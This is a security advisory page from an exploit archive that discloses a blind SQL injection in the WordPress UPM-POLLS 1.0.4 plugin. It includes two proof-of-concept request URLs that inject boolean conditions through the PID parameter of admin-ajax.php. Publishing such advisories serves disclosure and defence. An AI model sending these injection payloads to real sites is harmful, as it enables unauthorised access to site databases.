what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress UPM-POLLS 1.0.4 Blind SQL Injection

WordPress UPM-POLLS 1.0.4 Blind SQL Injection
Posted Dec 11, 2011
Authored by Saif El-Sherei

WordPress UPM-POLLS plugin version 1.0.4 suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 98921f30cbd1957f41300ca9134e7e6e2f77a9de7141c68ac2698d31cd442e95

WordPress UPM-POLLS 1.0.4 Blind SQL Injection

Change Mirror Download
# Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4
# Google Dork: n/a
# Date: 04-12-2011
# Author: Saif El-Sherei
# Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip
# Version: 1.0.4
# Tested on: wordpress 3.2.1,Firefox 4, XAMPP


Info:

Best Plugin to create Polls for your site. Everything is smoother, faster,
and seamless like WordPress itself.

Poll Manager,
Ability to set general and post/page specific polls,
Ability to leaf over the polls
Ability to add certain poll in certain post content
Ability to show polls either with and without current results of
polls


Details:

the Variable PID is not properly sanitized in the get request before
insertion into the database query; allowing an attaacker or any user who
can view poll results (supposedly all user) to use blind sql injection to
extract database data and possibly compromise the whole server. a POC is
provided with both true and false results.

POC 1(TRUE):

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and
1=1

"poll results for poll 2 is displayed"

POC 2 (FALSE):

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=upm_ayax_polls_result&do=result&post=1&type=general&PID=2and
1=2

"Blank page is displayed"

Time Line:
04-12-2011 Vulnerability discovered
04-12-2011 Vendor notified
11-12-2011 No response from vendor, public disclosure
Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close